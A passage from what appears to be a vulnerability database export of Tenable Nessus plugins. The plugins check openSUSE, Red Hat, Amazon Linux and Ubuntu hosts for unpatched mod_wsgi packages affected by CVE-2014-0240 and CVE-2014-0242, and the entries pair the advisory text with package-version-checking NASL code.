script_name(english:\"openSUSE Security Update : apache2-mod_wsgi (openSUSE-SU-2014:0782-1)\");\n script_summary(english:\"Check for the openSUSE-2014-421 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"apache2-mod_wsgi was updated to fix two security issues.\n\nThese security issues were fixed :\n\n - Information exposure (CVE-2014-0242)\n\n - Local privilege escalation (CVE-2014-0240)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=878550\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=878553\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2014-06/msg00022.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache2-mod_wsgi packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_wsgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_wsgi-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_wsgi-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/05/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3|SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3 / 13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"apache2-mod_wsgi-3.4-2.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"apache2-mod_wsgi-debuginfo-3.4-2.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"apache2-mod_wsgi-debugsource-3.4-2.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"apache2-mod_wsgi-3.4-2.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"apache2-mod_wsgi-debuginfo-3.4-2.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"apache2-mod_wsgi-debugsource-3.4-2.8.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2-mod_wsgi\");\n}\n", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:14:39", "description": "An updated mod_wsgi package that fixes two security issues is now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe mod_wsgi adapter is an Apache module that provides a\nWSGI-compliant interface for hosting Python-based web applications\nwithin Apache.\n\nIt was found that mod_wsgi did not properly drop privileges if the\ncall to setuid() failed. If mod_wsgi was set up to allow unprivileged\nusers to run WSGI applications, a local user able to run a WSGI\napplication could possibly use this flaw to escalate their privileges\non the system. (CVE-2014-0240)\n\nNote: mod_wsgi is not intended to provide privilege separation for\nWSGI applications. Systems relying on mod_wsgi to limit or sandbox the\nprivileges of mod_wsgi applications should migrate to a different\nsolution with proper privilege separation.\n\nIt was discovered that mod_wsgi could leak memory of a hosted web\napplication via the 'Content-Type' header. A remote attacker could\npossibly use this flaw to disclose limited portions of the web\napplication's memory. (CVE-2014-0242)\n\nRed Hat would like to thank Graham Dumpleton for reporting these\nissues. Upstream acknowledges Robert Kisteleki as the original\nreporter of CVE-2014-0240, and Buck Golemon as the original reporter\nof CVE-2014-0242.\n\nAll mod_wsgi users are advised to upgrade to this updated package,\nwhich contains backported patches to correct these issues.", "edition": 25, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-06-26T00:00:00", "title": "RHEL 6 : mod_wsgi (RHSA-2014:0788)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0240", "CVE-2014-0242"], "modified": "2014-06-26T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:6.5", "p-cpe:/a:redhat:enterprise_linux:mod_wsgi", "p-cpe:/a:redhat:enterprise_linux:mod_wsgi-debuginfo", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2014-0788.NASL", "href": "https://www.tenable.com/plugins/nessus/76243", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:0788. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76243);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-0240\", \"CVE-2014-0242\");\n script_xref(name:\"RHSA\", value:\"2014:0788\");\n\n script_name(english:\"RHEL 6 : mod_wsgi (RHSA-2014:0788)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated mod_wsgi package that fixes two security issues is now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe mod_wsgi adapter is an Apache module that provides a\nWSGI-compliant interface for hosting Python-based web applications\nwithin Apache.\n\nIt was found that mod_wsgi did not properly drop privileges if the\ncall to setuid() failed. If mod_wsgi was set up to allow unprivileged\nusers to run WSGI applications, a local user able to run a WSGI\napplication could possibly use this flaw to escalate their privileges\non the system. (CVE-2014-0240)\n\nNote: mod_wsgi is not intended to provide privilege separation for\nWSGI applications. Systems relying on mod_wsgi to limit or sandbox the\nprivileges of mod_wsgi applications should migrate to a different\nsolution with proper privilege separation.\n\nIt was discovered that mod_wsgi could leak memory of a hosted web\napplication via the 'Content-Type' header. A remote attacker could\npossibly use this flaw to disclose limited portions of the web\napplication's memory. (CVE-2014-0242)\n\nRed Hat would like to thank Graham Dumpleton for reporting these\nissues. Upstream acknowledges Robert Kisteleki as the original\nreporter of CVE-2014-0240, and Buck Golemon as the original reporter\nof CVE-2014-0242.\n\nAll mod_wsgi users are advised to upgrade to this updated package,\nwhich contains backported patches to correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2014:0788\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0240\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0242\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mod_wsgi and / or mod_wsgi-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_wsgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_wsgi-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/05/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:0788\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"mod_wsgi-3.2-6.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"mod_wsgi-3.2-6.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"mod_wsgi-3.2-6.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"mod_wsgi-debuginfo-3.2-6.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"mod_wsgi-debuginfo-3.2-6.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"mod_wsgi-debuginfo-3.2-6.el6_5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mod_wsgi / mod_wsgi-debuginfo\");\n }\n}\n", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T01:20:47", "description": "It was found that mod_wsgi did not properly drop privileges if the\ncall to setuid() failed. If mod_wsgi was set up to allow unprivileged\nusers to run WSGI applications, a local user able to run a WSGI\napplication could possibly use this flaw to escalate their privileges\non the system. Note: mod_wsgi is not intended to provide privilege\nseparation for WSGI applications. Systems relying on mod_wsgi to limit\nor sandbox the privileges of mod_wsgi applications should migrate to a\ndifferent solution with proper privilege separation.\n\nmod_wsgi allows you to host Python applications on the Apache HTTP\nServer. It was found that a remote attacker could leak portions of a\nmod_wsgi application's memory via the Content-Type header.", "edition": 26, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-10-12T00:00:00", "title": "Amazon Linux AMI : mod_wsgi (ALAS-2014-376)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0240", "CVE-2014-0242"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:mod_wsgi", "p-cpe:/a:amazon:linux:mod_wsgi-debuginfo", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2014-376.NASL", "href": "https://www.tenable.com/plugins/nessus/78319", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2014-376.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78319);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/12/18\");\n\n script_cve_id(\"CVE-2014-0240\", \"CVE-2014-0242\");\n script_xref(name:\"ALAS\", value:\"2014-376\");\n\n script_name(english:\"Amazon Linux AMI : mod_wsgi (ALAS-2014-376)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was found that mod_wsgi did not properly drop privileges if the\ncall to setuid() failed. If mod_wsgi was set up to allow unprivileged\nusers to run WSGI applications, a local user able to run a WSGI\napplication could possibly use this flaw to escalate their privileges\non the system. Note: mod_wsgi is not intended to provide privilege\nseparation for WSGI applications. Systems relying on mod_wsgi to limit\nor sandbox the privileges of mod_wsgi applications should migrate to a\ndifferent solution with proper privilege separation.\n\nmod_wsgi allows you to host Python applications on the Apache HTTP\nServer. It was found that a remote attacker could leak portions of a\nmod_wsgi application's memory via the Content-Type header.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2014-376.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update mod_wsgi' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod_wsgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod_wsgi-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/05/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"mod_wsgi-3.2-6.8.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod_wsgi-debuginfo-3.2-6.8.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mod_wsgi / mod_wsgi-debuginfo\");\n}\n", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T01:20:47", "description": "It was found that mod_wsgi did not properly drop privileges if the\ncall to setuid() failed. If mod_wsgi was set up to allow unprivileged\nusers to run WSGI applications, a local user able to run a WSGI\napplication could possibly use this flaw to escalate their privileges\non the system. Note: mod_wsgi is not intended to provide privilege\nseparation for WSGI applications. Systems relying on mod_wsgi to limit\nor sandbox the privileges of mod_wsgi applications should migrate to a\ndifferent solution with proper privilege separation.\n\nmod_wsgi allows you to host Python applications on the Apache HTTP\nServer. It was found that a remote attacker could leak portions of a\nmod_wsgi application's memory via the Content-Type header.", "edition": 26, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-10-12T00:00:00", "title": "Amazon Linux AMI : mod24_wsgi (ALAS-2014-375)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0240", "CVE-2014-0242"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:mod24_wsgi", "p-cpe:/a:amazon:linux:mod24_wsgi-debuginfo", "p-cpe:/a:amazon:linux:mod24_wsgi-py27", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2014-375.NASL", "href": "https://www.tenable.com/plugins/nessus/78318", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2014-375.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78318);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/12/18\");\n\n script_cve_id(\"CVE-2014-0240\", \"CVE-2014-0242\");\n script_xref(name:\"ALAS\", value:\"2014-375\");\n\n script_name(english:\"Amazon Linux AMI : mod24_wsgi (ALAS-2014-375)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was found that mod_wsgi did not properly drop privileges if the\ncall to setuid() failed. If mod_wsgi was set up to allow unprivileged\nusers to run WSGI applications, a local user able to run a WSGI\napplication could possibly use this flaw to escalate their privileges\non the system. Note: mod_wsgi is not intended to provide privilege\nseparation for WSGI applications. Systems relying on mod_wsgi to limit\nor sandbox the privileges of mod_wsgi applications should migrate to a\ndifferent solution with proper privilege separation.\n\nmod_wsgi allows you to host Python applications on the Apache HTTP\nServer. It was found that a remote attacker could leak portions of a\nmod_wsgi application's memory via the Content-Type header.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2014-375.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update mod24_wsgi' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_wsgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_wsgi-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_wsgi-py27\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/05/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"mod24_wsgi-3.5-1.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod24_wsgi-debuginfo-3.5-1.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod24_wsgi-py27-3.5-1.17.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mod24_wsgi / mod24_wsgi-debuginfo / mod24_wsgi-py27\");\n}\n", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T15:27:13", "description": "Robert Kisteleki discovered mod_wsgi incorrectly checked setuid\nreturn values. A malicious application could use this issue to cause a\nlocal privilege escalation when using daemon mode. (CVE-2014-0240)\n\nBuck Golemon discovered that mod_wsgi used memory that had been freed.\nA remote attacker could use this issue to read process memory via the\nContent-Type response header. This issue only affected Ubuntu 12.04\nLTS. (CVE-2014-0242).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 23, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-05-27T00:00:00", "title": "Ubuntu 12.04 LTS / 13.10 / 14.04 LTS : mod-wsgi vulnerabilities (USN-2222-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0240", "CVE-2014-0242"], "modified": "2014-05-27T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-wsgi", "cpe:/o:canonical:ubuntu_linux:13.10", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-wsgi-py3", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-2222-1.NASL", "href": "https://www.tenable.com/plugins/nessus/74185", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2222-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74185);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-0240\", \"CVE-2014-0242\");\n script_bugtraq_id(67532, 67534);\n script_xref(name:\"USN\", value:\"2222-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS / 13.10 / 14.04 LTS : mod-wsgi vulnerabilities (USN-2222-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Robert Kisteleki discovered mod_wsgi incorrectly checked setuid\nreturn values. A malicious application could use this issue to cause a\nlocal privilege escalation when using daemon mode. (CVE-2014-0240)\n\nBuck Golemon discovered that mod_wsgi used memory that had been freed.\nA remote attacker could use this issue to read process memory via the\nContent-Type response header. This issue only affected Ubuntu 12.04\nLTS. (CVE-2014-0242).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2222-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected libapache2-mod-wsgi and / or\nlibapache2-mod-wsgi-py3 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-wsgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-wsgi-py3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:13.10\");\n script_set_attribute(attribute:\"cpe\", 